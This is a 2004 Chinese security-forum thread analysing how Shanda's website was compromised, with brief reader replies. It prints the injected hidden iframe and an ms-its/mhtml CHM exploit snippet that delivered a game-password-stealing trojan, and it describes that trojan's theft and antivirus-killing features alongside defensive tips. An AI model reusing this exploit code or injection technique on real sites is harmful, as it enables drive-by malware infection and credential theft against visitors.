注册
登录
论坛
搜索
社区银行
帮助
导航
私人消息 (0)
公共消息 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
黑色海岸线论坛
»
网络安全
» 分析盛大被黑
返回列表
发帖
blackking
该用户已被删除
楼主
跳转到
»
倒序看帖
打印
字体大小:
t
T
blackking
发表于 2004-7-20 14:03
|
只看该作者
分析盛大被黑
[这个贴子最后由blackking在 2004/07/20 02:04pm 第 1 次编辑] 转载请注明出处 7.16龙哥给了我一个rar的压缩包,说是盛大给黑的截图以及一些相关的东西, 叫我分析一下,我见也没事做,也就接下来这个任务了。 解压后的文件有4个,分别是poptang.compop.htm,盛大.bmp 盛大1.htm,pop.chm bmp的是抓图,先看看盛大1.htm,猜了一下,去问问了龙,证实是骇客们入侵了盛大的 网站后,估计是利用asp木马来编辑文件,在网页中插入
<font color="#FF0000"><br> 这样,只要受害者一访问网站,就会自动去访问pop.htm,我们来看看pop.htm pop.htm已经给改名为poptang.compop.htm了,主要的代码如下 <textarea id="code" style="display:none;"> <object data="ms-its:mhtml:file&://c:\foo.mht!${path}/pop.chm::/test.htm" type="text/x-scriptlet"></object> </textarea> <script language="javascript"> document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('pop.htm')))); </script> 主要是运行下载了的pop.chm,而且这个pop.chm很明显,就是最近颇为流行的chm木马了,我打开那个CHM文件,打开这个文件的下一个 页面,立刻提示下载一个名为test.exe的文件,呵呵,估计这个才是我们今天重点要分析的对象,用侦壳工具查看了一下,发现不出是 什么加的壳,只好用winhex打开看看,不过却发现有aspack字样,相信各位也和我一样以为是aspack的壳吧,没想到测试了几个专用的 脱壳工具后,才发现不行,只好作罢。正在发愁的时候刚好见到好友kcarhc上来了,也正是黑基以前的血紫狂刀,叫他帮我脱一下壳, 没想到他却说是telock加的壳,晕死了。叫他脱完壳发给我,没想到他顺手也帮我反汇编了,郁闷,我还大显身手一次。 直接说出那个木马的功能吧,盗密码是肯定的了,好想是用service@263.net这个e-mail来发送,主题为 录取通知书,该木马具有以下功能 记录受害者的电脑的传奇的: 传奇登录 登录 发送时间 服务器 附加信息 计算机名 角色 密码 物品信息 用户名 区域 还会自动搜索一下的安全软件来终止它。 噬菌 天网防火墙个人版 天网防火墙企业版 木马克星 的确够狠,不过功能却是一般,下面我们说说如何防止这类木马。 1,不要以为装个杀毒软件就没事了,我可是把那个木马下载后,以及就算脱壳 用诺顿来扫描都提示没有发现病毒,我个人就比较建议或者推荐要及时更新windows的补丁 2,打开注册表,把HKEY_CURRENT_USER\software\microsofr\windows\current version\internetsettings\zone\0的1004项的值由 原来的0改成16进制的3. By YtT [HB] 转载请注明出处 7.16龙哥给了我一个rar的压缩包,说是盛大给黑的截图以及一些相关的东西, 叫我分析一下,我见也没事做,也就接下来这个任务了。 解压后的文件有4个,分别是poptang.compop.htm,盛大.bmp 盛大1.htm,pop.chm bmp的是抓图,先看看盛大1.htm,猜了一下,去问问了龙,证实是骇客们入侵了盛大的 网站后,估计是利用asp木马来编辑文件,在网页中插入 <td align="center"><strong><iframe src="pop.htm" width="0" height="0"><font color="#FF0000"><br> 这样,只要受害者一访问网站,就会自动去访问pop.htm,我们来看看pop.htm pop.htm已经给改名为poptang.compop.htm了,主要的代码如下 <textarea id="code" style="display:none;"> <object data="ms-its:mhtml:file&://c:\foo.mht!${path}/pop.chm::/test.htm" type="text/x-scriptlet"></object> </textarea> <script language="javascript"> document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('pop.htm')))); </script> 主要是运行下载了的pop.chm,而且这个pop.chm很明显,就是最近颇为流行的chm木马了,我打开那个CHM文件,打开这个文件的下一个 页面,立刻提示下载一个名为test.exe的文件,呵呵,估计这个才是我们今天重点要分析的对象,用侦壳工具查看了一下,发现不出是 什么加的壳,只好用winhex打开看看,不过却发现有aspack字样,相信各位也和我一样以为是aspack的壳吧,没想到测试了几个专用的 脱壳工具后,才发现不行,只好作罢。正在发愁的时候刚好见到好友kcarhc上来了,也正是黑基以前的血紫狂刀,叫他帮我脱一下壳, 没想到他却说是telock加的壳,晕死了。叫他脱完壳发给我,没想到他顺手也帮我反汇编了,郁闷,我还大显身手一次。 直接说出那个木马的功能吧,盗密码是肯定的了,好想是用service@263.net这个e-mail来发送,主题为 录取通知书,该木马具有以下功能 记录受害者的电脑的传奇的: 传奇登录 登录 发送时间 服务器 附加信息 计算机名 角色 密码 物品信息 用户名 区域 还会自动搜索一下的安全软件来终止它。 噬菌 天网防火墙个人版 天网防火墙企业版 木马克星 的确够狠,不过功能却是一般,下面我们说说如何防止这类木马。 1,不要以为装个杀毒软件就没事了,我可是把那个木马下载后,以及就算脱壳 用诺顿来扫描都提示没有发现病毒,我个人就比较建议或者推荐要及时更新windows的补丁 2,打开注册表,把HKEY_CURRENT_USER\software\microsofr\windows\current version\internetsettings\zone\0的1004项的值由 原来的0改成16进制的3. </td></tr></table> </div> <div id="post_rate_div_45065"></div> <div class="useraction"> <a href="javascript:;" onclick="showDialog($('favoritewin').innerHTML, 'info', '收藏/关注')">收藏</a> <a href="javascript:;" id="share" onclick="showDialog($('sharewin').innerHTML, 'info', '分享')">分享</a> </div> </div> </div> </td></tr> <tr><td class="postcontent postbottom"> <div id="ad_thread1_0"></div></td> </tr> <tr> <td class="postauthor"></td> <td class="postcontent"> <div class="postactions"> <div class="postact s_clear"> <em> </em> <p> </p> </div> </div> </td> </tr> <tr class="threadad"> <td class="postauthor"></td> <td class="adcontent"> <div id="ad_interthread"></div></td> </tr> </table> </div><div id="post_45066"><table id="pid45066" summary="pid45066" cellspacing="0" cellpadding="0"> <tr> <td class="postauthor" rowspan="2"> <div class="avatar"> skyxhc <em>该用户已被删除</em> </div> </td> <td class="postcontent"> <div class="postinfo"> <strong><a title="复制本帖链接" id="postnum45066" href="javascript:;" onclick="setCopy('http://bbs.thysea.com/redirect.php?goto=findpost&ptid=7201&pid=45066', '帖子地址已经复制到剪贴板')">沙发</a> </strong> <div class="posterinfo"> <div class="pagecontrol"> </div> <div class="authorinfo"> <img class="authicon" id="authicon45066" src="images/common/online_member.gif" onclick="showauthor(this, 'userinfo45066');" /> <a href="space-uid-26826.html" class="posterlink" target="_blank">skyxhc</a><em id="authorposton45066">发表于 2004-7-22 17:01</em> | <a href="viewthread.php?tid=7201&page=1&authorid=26826" rel="nofollow">只看该作者</a> </div> </div> </div> <div class="defaultpost"> <div id="ad_thread2_1"></div><div id="ad_thread3_1"></div><div id="ad_thread4_1"></div> <div class="postmessage "> <h2> 分析盛大被黑</h2> <div class="t_msgfontfix"> <table cellspacing="0" cellpadding="0"><tr><td class="t_msgfont" id="postmessage_45066">hehe就为了几个密码,就,,,,,。。<br /> 唉,没得说</td></tr></table> </div> <div id="post_rate_div_45066"></div> </div> </div> </td></tr> <tr><td class="postcontent postbottom"> <div id="ad_thread1_1"></div></td> </tr> <tr> <td class="postauthor"></td> <td class="postcontent"> <div class="postactions"> <div class="postact s_clear"> <em> </em> <p> <a href="javascript:;" onclick="scrollTo(0,0);">TOP</a> </p> </div> </div> </td> </tr> <tr class="threadad"> <td class="postauthor"></td> <td class="adcontent"> </td> </tr> </table> </div><div id="post_45067"><table id="pid45067" summary="pid45067" cellspacing="0" cellpadding="0"> <tr> <td class="postauthor" rowspan="2"> <div class="avatar"> zlcton <em>该用户已被删除</em> </div> </td> <td class="postcontent"> <div class="postinfo"> <strong><a title="复制本帖链接" id="postnum45067" href="javascript:;" onclick="setCopy('http://bbs.thysea.com/redirect.php?goto=findpost&ptid=7201&pid=45067', '帖子地址已经复制到剪贴板')">板凳</a> </strong> <div class="posterinfo"> <div class="pagecontrol"> </div> <div class="authorinfo"> <img class="authicon" id="authicon45067" src="images/common/online_member.gif" onclick="showauthor(this, 'userinfo45067');" /> <a href="space-uid-37210.html" class="posterlink" target="_blank">zlcton</a><em id="authorposton45067">发表于 2004-7-22 17:38</em> | <a href="viewthread.php?tid=7201&page=1&authorid=37210" rel="nofollow">只看该作者</a> </div> </div> </div> <div class="defaultpost"> <div id="ad_thread2_2"></div><div id="ad_thread3_2"></div><div id="ad_thread4_2"></div> <div class="postmessage "> <h2> 分析盛大被黑</h2> <div class="t_msgfontfix"> <table cellspacing="0" cellpadding="0"><tr><td class="t_msgfont" id="postmessage_45067">这么说这个人很有脑吗!!!????</td></tr></table> </div> <div id="post_rate_div_45067"></div> </div> </div> </td></tr> <tr><td class="postcontent postbottom"> <div id="ad_thread1_2"></div></td> </tr> <tr> <td class="postauthor"></td> <td class="postcontent"> <div class="postactions"> <div class="postact s_clear"> <em> </em> <p> <a href="javascript:;" onclick="scrollTo(0,0);">TOP</a> </p> </div> </div> </td> </tr> <tr class="threadad"> <td class="postauthor"></td> <td class="adcontent"> </td> </tr> </table> </div><div id="post_45068"><table id="pid45068" summary="pid45068" cellspacing="0" cellpadding="0"> <tr> <td class="postauthor" rowspan="2"> <div class="avatar"> xiaomingeg <em>该用户已被删除</em> </div> </td> <td class="postcontent"> <div class="postinfo"> <strong><a title="复制本帖链接" id="postnum45068" href="javascript:;" onclick="setCopy('http://bbs.thysea.com/redirect.php?goto=findpost&ptid=7201&pid=45068', '帖子地址已经复制到剪贴板')">地板</a> </strong> <div class="posterinfo"> <div class="pagecontrol"> </div> <div class="authorinfo"> <img class="authicon" id="authicon45068" src="images/common/online_member.gif" onclick="showauthor(this, 'userinfo45068');" /> <a href="space-uid-32777.html" class="posterlink" target="_blank">xiaomingeg</a><em id="authorposton45068">发表于 2004-7-24 11:28</em> | <a href="viewthread.php?tid=7201&page=1&authorid=32777" rel="nofollow">只看该作者</a> </div> </div> </div> <div class="defaultpost"> <div id="ad_thread2_3"></div><div id="ad_thread3_3"></div><div id="ad_thread4_3"></div> <div class="postmessage "> <h2> 分析盛大被黑</h2> <div class="t_msgfontfix"> <table cellspacing="0" cellpadding="0"><tr><td class="t_msgfont" id="postmessage_45068">公布盛大被黑的网络,黑客动画吧,被黑了。</td></tr></table> </div> <div id="post_rate_div_45068"></div> </div> </div> </td></tr> <tr><td class="postcontent postbottom"> <div id="ad_thread1_3"></div></td> </tr> <tr> <td class="postauthor"></td> <td class="postcontent"> <div class="postactions"> <div class="postact s_clear"> <em> </em> <p> <a href="javascript:;" onclick="scrollTo(0,0);">TOP</a> </p> </div> </div> </td> </tr> <tr class="threadad"> <td class="postauthor"></td> <td class="adcontent"> </td> </tr> </table> </div><div id="post_45069"><table id="pid45069" summary="pid45069" cellspacing="0" cellpadding="0"> <tr> <td class="postauthor" rowspan="2"> <div class="avatar"> realned <em>该用户已被删除</em> </div> </td> <td class="postcontent"> <div class="postinfo"> <strong><a title="复制本帖链接" id="postnum45069" href="javascript:;" onclick="setCopy('http://bbs.thysea.com/redirect.php?goto=findpost&ptid=7201&pid=45069', '帖子地址已经复制到剪贴板')"><em>5</em>楼</a> </strong> <div class="posterinfo"> <div class="pagecontrol"> </div> <div class="authorinfo"> <img class="authicon" id="authicon45069" src="images/common/online_member.gif" onclick="showauthor(this, 'userinfo45069');" /> <a href="space-uid-24902.html" class="posterlink" target="_blank">realned</a><em id="authorposton45069">发表于 2004-7-24 12:29</em> | <a href="viewthread.php?tid=7201&page=1&authorid=24902" rel="nofollow">只看该作者</a> </div> </div> </div> <div class="defaultpost"> <div id="ad_thread2_4"></div><div id="ad_thread3_4"></div><div id="ad_thread4_4"></div> <div class="postmessage "> <h2> 分析盛大被黑</h2> <div class="t_msgfontfix"> <table cellspacing="0" cellpadding="0"><tr><td class="t_msgfont" id="postmessage_45069">到底是这些网站防守不好,还是对手进攻太强。</td></tr></table> </div> <div id="post_rate_div_45069"></div> </div> </div> </td></tr> <tr><td class="postcontent postbottom"> <div id="ad_thread1_4"></div></td> </tr> <tr> <td class="postauthor"></td> <td class="postcontent"> <div class="postactions"> <div class="postact s_clear"> <em> </em> <p> <a href="javascript:;" onclick="scrollTo(0,0);">TOP</a> </p> </div> </div> </td> </tr> <tr class="threadad"> <td class="postauthor"></td> <td class="adcontent"> </td> </tr> </table> </div><div id="post_45070"><table id="pid45070" summary="pid45070" cellspacing="0" cellpadding="0"> <tr> <td class="postauthor" rowspan="2"> <a name="lastpost"></a><div class="avatar"> 咆哮的蜗牛 <em>该用户已被删除</em> </div> </td> <td class="postcontent"> <div class="postinfo"> <strong><a title="复制本帖链接" id="postnum45070" href="javascript:;" onclick="setCopy('http://bbs.thysea.com/redirect.php?goto=findpost&ptid=7201&pid=45070', '帖子地址已经复制到剪贴板')"><em>6</em>楼</a> </strong> <div class="posterinfo"> <div class="pagecontrol"> </div> <div class="authorinfo"> <img class="authicon" id="authicon45070" src="images/common/online_member.gif" onclick="showauthor(this, 'userinfo45070');" /> <a href="space-uid-39892.html" class="posterlink" target="_blank">咆哮的蜗牛</a><em id="authorposton45070">发表于 2004-8-9 18:26</em> | <a href="viewthread.php?tid=7201&page=1&authorid=39892" rel="nofollow">只看该作者</a> </div> </div> </div> <div class="defaultpost"> <div id="ad_thread2_5"></div><div id="ad_thread3_5"></div><div id="ad_thread4_5"></div> <div class="postmessage "> <h2> 分析盛大被黑</h2> <div class="t_msgfontfix"> <table cellspacing="0" cellpadding="0"><tr><td class="t_msgfont" id="postmessage_45070">支持楼上哪位 要看动画</td></tr></table> </div> <div id="post_rate_div_45070"></div> </div> </div> </td></tr> <tr><td class="postcontent postbottom"> <div id="ad_thread1_5"></div></td> </tr> <tr> <td class="postauthor"></td> <td class="postcontent"> <div class="postactions"> <div class="postact s_clear"> <em> </em> <p> <a href="javascript:;" onclick="scrollTo(0,0);">TOP</a> </p> </div> </div> </td> </tr> <tr class="threadad"> <td class="postauthor"></td> <td class="adcontent"> </td> </tr> </table> </div></div> <div id="postlistreply" class="mainbox viewthread"><div id="post_new" class="viewthread_table" style="display: none"></div></div> <form method="post" name="modactions" id="modactions"> <input type="hidden" name="formhash" value="b2c8c677" /> <input type="hidden" name="optgroup" /> <input type="hidden" name="operation" /> <input type="hidden" name="listextra" value="" /> </form> <script type="text/javascript">var tagarray = ['软件','手机','免费','南京智浩科技','机房报警','正版','珠江','南京','电脑','二手笔记本','南京二手笔记本','陈德志','二手笔记本批发','模块','批发出售','电脑配件','二手IBM','温度报警','教程','浩浩','IBM','论坛','朋友','支付宝','神马','歌曲','路全新','网络安全','原创歌手','MP3','托盘','宴会','分量','带宽分配','杯子','果汁','妓女','远程维护','系统安全','销售管理','蓝牙','四川旅游','ATI','歌手','网络客户','保密','检查','取证','工具','电脑软件','环境监控','交换机','诺基亚','多普达','时尚','三星','正品','三星W629','AMD','伯爵','行为管理','数码相机','空调启动切换器','空调控制器','空调启动器','空调启动切换控制器','宝贝','IBM批发','东莞','发网','批发价格','GSM机房环境监控','机房环境监控','推荐','帮忙','垃圾邮件','网络ghost','网络克隆','梭子鱼','杀毒','硬盘克隆','ibmpifa','台式','铭瑄','ISO27001','笔记本','性价比','国庆','出货','戴尔','电脑报价','出售','亏本','南京二手电脑','你来啦','即时通讯','风险管理','咨询','信息安全','清扬'];var tagencarray = ['%C8%ED%BC%FE','%CA%D6%BB%FA','%C3%E2%B7%D1','%C4%CF%BE%A9%D6%C7%BA%C6%BF%C6%BC%BC','%BB%FA%B7%BF%B1%A8%BE%AF','%D5%FD%B0%E6','%D6%E9%BD%AD','%C4%CF%BE%A9','%B5%E7%C4%D4','%B6%FE%CA%D6%B1%CA%BC%C7%B1%BE','%C4%CF%BE%A9%B6%FE%CA%D6%B1%CA%BC%C7%B1%BE','%B3%C2%B5%C2%D6%BE','%B6%FE%CA%D6%B1%CA%BC%C7%B1%BE%C5%FA%B7%A2','%C4%A3%BF%E9','%C5%FA%B7%A2%B3%F6%CA%DB','%B5%E7%C4%D4%C5%E4%BC%FE','%B6%FE%CA%D6IBM','%CE%C2%B6%C8%B1%A8%BE%AF','%BD%CC%B3%CC','%BA%C6%BA%C6','IBM','%C2%DB%CC%B3','%C5%F3%D3%D1','%D6%A7%B8%B6%B1%A6','%C9%F1%C2%ED','%B8%E8%C7%FA','%C2%B7%C8%AB%D0%C2','%CD%F8%C2%E7%B0%B2%C8%AB','%D4%AD%B4%B4%B8%E8%CA%D6','MP3','%CD%D0%C5%CC','%D1%E7%BB%E1','%B7%D6%C1%BF','%B4%F8%BF%ED%B7%D6%C5%E4','%B1%AD%D7%D3','%B9%FB%D6%AD','%BC%CB%C5%AE','%D4%B6%B3%CC%CE%AC%BB%A4','%CF%B5%CD%B3%B0%B2%C8%AB','%CF%FA%CA%DB%B9%DC%C0%ED','%C0%B6%D1%C0','%CB%C4%B4%A8%C2%C3%D3%CE','ATI','%B8%E8%CA%D6','%CD%F8%C2%E7%BF%CD%BB%A7','%B1%A3%C3%DC','%BC%EC%B2%E9','%C8%A1%D6%A4','%B9%A4%BE%DF','%B5%E7%C4%D4%C8%ED%BC%FE','%BB%B7%BE%B3%BC%E0%BF%D8','%BD%BB%BB%BB%BB%FA','%C5%B5%BB%F9%D1%C7','%B6%E0%C6%D5%B4%EF','%CA%B1%C9%D0','%C8%FD%D0%C7','%D5%FD%C6%B7','%C8%FD%D0%C7W629','AMD','%B2%AE%BE%F4','%D0%D0%CE%AA%B9%DC%C0%ED','%CA%FD%C2%EB%CF%E0%BB%FA','%BF%D5%B5%F7%C6%F4%B6%AF%C7%D0%BB%BB%C6%F7','%BF%D5%B5%F7%BF%D8%D6%C6%C6%F7','%BF%D5%B5%F7%C6%F4%B6%AF%C6%F7','%BF%D5%B5%F7%C6%F4%B6%AF%C7%D0%BB%BB%BF%D8%D6%C6%C6%F7','%B1%A6%B1%B4','IBM%C5%FA%B7%A2','%B6%AB%DD%B8','%B7%A2%CD%F8','%C5%FA%B7%A2%BC%DB%B8%F1','GSM%BB%FA%B7%BF%BB%B7%BE%B3%BC%E0%BF%D8','%BB%FA%B7%BF%BB%B7%BE%B3%BC%E0%BF%D8','%CD%C6%BC%F6','%B0%EF%C3%A6','%C0%AC%BB%F8%D3%CA%BC%FE','%CD%F8%C2%E7ghost','%CD%F8%C2%E7%BF%CB%C2%A1','%CB%F3%D7%D3%D3%E3','%C9%B1%B6%BE','%D3%B2%C5%CC%BF%CB%C2%A1','ibmpifa','%CC%A8%CA%BD','%C3%FA%ACu','ISO27001','%B1%CA%BC%C7%B1%BE','%D0%D4%BC%DB%B1%C8','%B9%FA%C7%EC','%B3%F6%BB%F5','%B4%F7%B6%FB','%B5%E7%C4%D4%B1%A8%BC%DB','%B3%F6%CA%DB','%BF%F7%B1%BE','%C4%CF%BE%A9%B6%FE%CA%D6%B5%E7%C4%D4','%C4%E3%C0%B4%C0%B2','%BC%B4%CA%B1%CD%A8%D1%B6','%B7%E7%CF%D5%B9%DC%C0%ED','%D7%C9%D1%AF','%D0%C5%CF%A2%B0%B2%C8%AB','%C7%E5%D1%EF'];parsetag(45065);</script> <div class="forumcontrol s_clear"> <table cellspacing="0" cellpadding="0" > <tr> <td class="modaction"> </td> <td> <span class="pageback"><a href="forumdisplay.php?fid=1">返回列表</a></span> <span class="replybtn"><a href="post.php?action=reply&fid=1&tid=7201" onclick="showWindow('reply', this.href);return false;">回复</a></span> <span class="postbtn" id="newspecialtmp" onmouseover="$('newspecial').id = 'newspecialtmp';this.id = 'newspecial';showMenu({'ctrlid':this.id})"><a href="post.php?action=newthread&fid=1" onclick="showWindow('newthread', this.href);return false;">发帖</a></span> </td> </tr> </table> </div> <div class="popupmenu_popup" id="fjump_menu" style="display: none"> <dl><dt><a href="index.php?gid=270">使用交流</a></dt><dd><ul><li class="current"><a href="forumdisplay.php?fid=1">网络安全</a></li><li><a href="forumdisplay.php?fid=18">网络技术</a></li></ul></dd></dl><dl><dt><a href="index.php?gid=188">娱乐休闲</a></dt><dd><ul><li><a href="forumdisplay.php?fid=2">灌水乐园</a></li><li><a href="forumdisplay.php?fid=413">文学天地</a></li><li><a href="forumdisplay.php?fid=353">美图欣赏</a></li></ul></dd></dl><dl><dt><a href="index.php?gid=409">网站办公</a></dt><dd><ul><li><a href="forumdisplay.php?fid=14">站务处理</a></li></ul></dd></dl></div> <div id="favoritewin" style="display: none"> <h5> <a href="javascript:;" onclick="ajaxget('my.php?item=favorites&tid=7201', 'favorite_msg');return false;" class="lightlink">[收藏此主题]</a> <a href="javascript:;" onclick="ajaxget('my.php?item=attention&action=add&tid=7201', 'favorite_msg');return false;" class="lightlink">[关注此主题的新回复]</a> </h5> <span id="favorite_msg"></span> </div> <div id="sharewin" style="display: none"> <h5> <a href="javascript:;" onclick="setCopy('分析盛大被黑\nhttp://bbs.thysea.com/viewthread.php?tid=7201', '帖子地址已经复制到剪贴板<br />您可以用快捷键 Ctrl + V 粘贴到 QQ、MSN 里。')" class="lightlink" />[通过 QQ、MSN 分享给朋友]</a><br /><br /> </h5> </div> </div><div id="ad_footerbanner1"></div><div id="ad_footerbanner2"></div><div id="ad_footerbanner3"></div> <div id="footer"> <div class="wrap s_clear"> <div id="footlink"> <p> <strong><a href="http://www.thysea.com/" target="_blank">黑色海岸线</a></strong> <span class="pipe">|</span><a href="mailto:support@microsoft.com">联系我们</a> <span class="pipe">|</span><a href="stats.php">论坛统计</a><span class="pipe">|</span><a href="archiver/" target="_blank">Archiver</a></p> <p class="smalltext"> GMT+8, 2025-1-12 19:47, <span id="debuginfo">Processed in 0.049289 second(s), 5 queries, Gzip enabled</span>. </p> </div> <div id="rightinfo"> <p>Powered by <strong><a href="http://www.discuz.net" target="_blank">Discuz!</a></strong> <em>7.2</em></p> <p class="smalltext">© 2001-2009 <a href="http://www.comsenz.com" target="_blank">Comsenz Inc.</a></p> </div></div> </div> </body> </html>
